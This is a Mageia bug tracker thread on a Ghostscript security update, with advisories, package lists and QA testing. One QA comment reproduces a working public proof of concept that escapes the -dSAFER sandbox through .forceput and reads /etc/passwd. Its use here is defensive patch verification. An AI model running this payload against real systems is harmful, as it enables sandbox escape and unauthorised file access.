A security issue fixed upstream in Ghostscript has been announced: https://www.openwall.com/lists/oss-security/2018/10/09/4 The commits that fixed the issue are linked from the message above. Mageia 6 is also affected.
Whiteboard: (none) => MGA6TOO
Bug 23526, our previous update, didn't mention: CVE-2018-11645 CVE-2018-16585 CVE-2018-17183 Ubuntu has issued advisories for those on September 19 and October 1: https://usn.ubuntu.com/3768-1/ https://usn.ubuntu.com/3773-1/
Assigning to all packagers collectively, since there is no registered maintainer for this package. Also CC'ing two committers.
CC: (none) => marja11, nicolas.salguero, smelrorAssignee: bugsquad => pkg-bugs
Suggested advisory: ======================== The updated packages fix many bugs and a security vulnerability: Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961) References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961 https://www.openwall.com/lists/oss-security/2018/10/09/4 ======================== Updated packages in core/updates_testing: ======================== ghostscript-9.25-1.mga6 ghostscript-dvipdf-9.25-1.mga6 ghostscript-common-9.25-1.mga6 ghostscript-X-9.25-1.mga6 ghostscript-module-X-9.25-1.mga6 lib(64)gs9-9.25-1.mga6 lib(64)gs-devel-9.25-1.mga6 lib(64)ijs1-0.35-140.mga6 lib(64)ijs-devel-0.35-140.mga6 ghostscript-doc-9.25-1.mga6 from SRPMS: ghostscript-9.25-1.mga6.src.rpm
Status: NEW => ASSIGNEDVersion: Cauldron => 6Whiteboard: MGA6TOO => (none)
Assignee: pkg-bugs => qa-bugs
What about Comment 1?
Keywords: (none) => feedback
(In reply to David Walser from comment #4) > What about Comment 1? According to MITRE: - CVE-2018-11645: Ghostscript before 9.21rc1 - CVE-2018-16585: Ghostscript before 9.24 - CVE-2018-17183: Ghostscript before 9.25 but the commit linked to that CVE was already in our ghostscript-9.24 package.
Thanks!
Keywords: feedback => (none)
One more commit is necessary: https://www.openwall.com/lists/oss-security/2018/10/11/3
And yet another needed commit with a new CVE: https://www.openwall.com/lists/oss-security/2018/10/10/12
Summary: ghostscript new security issue CVE-2018-17961 => ghostscript new security issue CVE-2018-17961 and CVE-2018-18073
Suggested advisory: ======================== The updated packages fix many bugs and security vulnerabilities: Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961) Saved execution stacks can leak operator arrays. (CVE-2018-18073) References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073 https://www.openwall.com/lists/oss-security/2018/10/09/4 https://www.openwall.com/lists/oss-security/2018/10/11/3 https://www.openwall.com/lists/oss-security/2018/10/10/12 ======================== Updated packages in core/updates_testing: ======================== ghostscript-9.25-1.1.mga6 ghostscript-dvipdf-9.25-1.1.mga6 ghostscript-common-9.25-1.1.mga6 ghostscript-X-9.25-1.1.mga6 ghostscript-module-X-9.25-1.1.mga6 lib(64)gs9-9.25-1.1.mga6 lib(64)gs-devel-9.25-1.1.mga6 lib(64)ijs1-0.35-140.1.mga6 lib(64)ijs-devel-0.35-140.1.mga6 ghostscript-doc-9.25-1.1.mga6 from SRPMS: ghostscript-9.25-1.1.mga6.src.rpm
Mageia 6, x86_64 Topped up the pre-update packages. Before update: CVE-2018-17961 https://www.openwall.com/lists/oss-security/2018/10/10/12 $ gs -dSAFER -sDEVICE=ppmraw GS>{ null .setglobal } stopped clear GS>$error /estack get == [--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) [...] null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1916 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}] GS>quit Quoting the reference above: "Once you have a reference to forceput, you can do anything you like, see the exploit for CVE-2018-18073 as an example of abusing forceput to get arbitrary filesystem access." I could not find that exploit but updating solved the problem. Waiting for the mirrors to sync. Tested the earlier update. When the new files appear I will run through the same tests again and report any differences in behaviour. After the first update you can access the error stack safely: $ gs -dSAFER -sDEVICE=ppmraw GPL Ghostscript 9.25 (2018-09-13) Copyright (C) 2018 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file PUBLIC for details. GS>{ null .setglobal } stopped clear GS>$error /estack get == [--%interp_exit-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- --.setglobal-- --%loop_continue-- --.setglobal-- --.setglobal-- false 1 --%stopped_push-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1920 1 3 --%oparray_pop-- --.setglobal--] GS> Ran a few simple tests of gs. Displayed a postscript file. $ gs abc-0.ps GPL Ghostscript 9.25 (2018-09-13) Copyright (C) 2018 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file PUBLIC for details. Querying operating system for font files... Can't find (or can't open) font file /usr/share/ghostscript/9.25/Resource/Font/BorzoiRegular. Can't find (or can't open) font file BorzoiRegular. Loading BorzoiRegular font from /home/lcl/.local/share/fonts/BorzoiRegular.pfb... 4495204 2874741 3183244 1851046 3 done. >>showpage, press <return> to continue<< GS>quit LibreOffice has ghostscript support. The same file displayed OK with that. Browsed an e-book pdf file with gs, hitting return to turn the pages. On quit it insisted on flicking through the rest of the 832 pages. Converted a dvi file to a pdf. $ dvipdf refcard.dvi refcard.pdf dvips: Font cmbx10 at 13824 not found; scaling 600 instead. dvips: Such scaling will generate extremely poor output. Page 1 may be too complex to print Page 2 may be too complex to print Page 5 may be too complex to print Page 6 may be too complex to print Warning: no %%Page comments generated. In fact it reproduced perfectly in okular - no loss of quality. Looks OK for 64-bits.
CC: (none) => tarazed25
CVE-2018-18073 has reserved status; no details of possible exploits available. Passing it on.
Whiteboard: (none) => MGA6-64-OK
Ugh, another commit is needed for CVE-2018-18284: https://www.openwall.com/lists/oss-security/2018/10/16/2 Can we add it in?
Suggested advisory: ======================== The updated packages fix many bugs and security vulnerabilities: Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961) Saved execution stacks can leak operator arrays. (CVE-2018-18073) 1Policy operator gives access to .forceput. (CVE-2018-18284) References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18284 https://www.openwall.com/lists/oss-security/2018/10/09/4 https://www.openwall.com/lists/oss-security/2018/10/11/3 https://www.openwall.com/lists/oss-security/2018/10/10/12 https://www.openwall.com/lists/oss-security/2018/10/16/2 ======================== Updated packages in core/updates_testing: ======================== ghostscript-9.25-1.2.mga6 ghostscript-dvipdf-9.25-1.2.mga6 ghostscript-common-9.25-1.2.mga6 ghostscript-X-9.25-1.2.mga6 ghostscript-module-X-9.25-1.2.mga6 lib(64)gs9-9.25-1.2.mga6 lib(64)gs-devel-9.25-1.2.mga6 lib(64)ijs1-0.35-140.2.mga6 lib(64)ijs-devel-0.35-140.2.mga6 ghostscript-doc-9.25-1.2.mga6 from SRPMS: ghostscript-9.25-1.2.mga6.src.rpm
CVE: (none) => CVE-2018-17961, CVE-2018-18073, CVE-2018-18284Summary: ghostscript new security issue CVE-2018-17961 and CVE-2018-18073 => ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284
Whiteboard: MGA6-64-OK => (none)
ghostscript-9.25-1.1.mga6 CVE-2018-18284 Tried out the commands given at https://www.openwall.com/lists/oss-security/2018/10/16/2 $ gs -dSAFER -sDEVICE=ppmraw GPL Ghostscript 9.25 (2018-09-13) Copyright (C) 2018 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file PUBLIC for details. GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def GS>systemdict /SAFER false .forceput GS>systemdict /userparams get /PermitFileControl [(*)] .forceput GS>systemdict /userparams get /PermitFileWriting [(*)] .forceput GS>systemdict /userparams get /PermitFileReading [(*)] .forceput GS>(/etc/passwd) (r) file 1024 string readline pop == (root:x:0:0:root:/root:/bin/bash)(root:x:0:0:root:/root:/bin/bash) GS>quit The new version is not on the mirrors yet. Later.
Updated the packages. $ rpm -qa | grep ghostscript ghostscript-9.25-1.2.mga6 ghostscript-module-X-9.25-1.2.mga6 ghostscript-dvipdf-9.25-1.2.mga6 ghostscript-common-9.25-1.2.mga6 ghostscript-X-9.25-1.2.mga6 $ gs -dSAFER -sDEVICE=ppmraw GPL Ghostscript 9.25 (2018-09-13) Copyright (C) 2018 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file PUBLIC for details. GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def GS>systemdict /SAFER false .forceput Error: /undefined in .policyprocs Operand stack: --dict:963/1684(ro)(G)-- SAFER false --dict:0/0(L)-- --dict:0/0(L)-- --dict:963/1684(ro)(G)-- (ignored) SAFER false Execution stack: %interp_exit .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- %loop_continue --nostringval-- --nostringval-- false 1 %stopped_push .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- Dictionary stack: --dict:963/1684(ro)(G)-- --dict:0/20(G)-- --dict:79/200(L)-- Current allocation mode is local Last OS error: No such file or directory Current file position is 34 Any further attempts to use systemdict are thwarted in the same way. Good result. Ran simple tests again. Printed a postscript file. It looks fine.
Looks good to me, after Len's tests. Validating. Correct (I think) advisory suggestion in Comment 13.
Keywords: (none) => validated_updateCC: (none) => andrewsfarm, sysadmin-bugs
Keywords: (none) => advisoryCC: (none) => tmb
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2018-0408.html
Resolution: (none) => FIXEDStatus: ASSIGNED => RESOLVED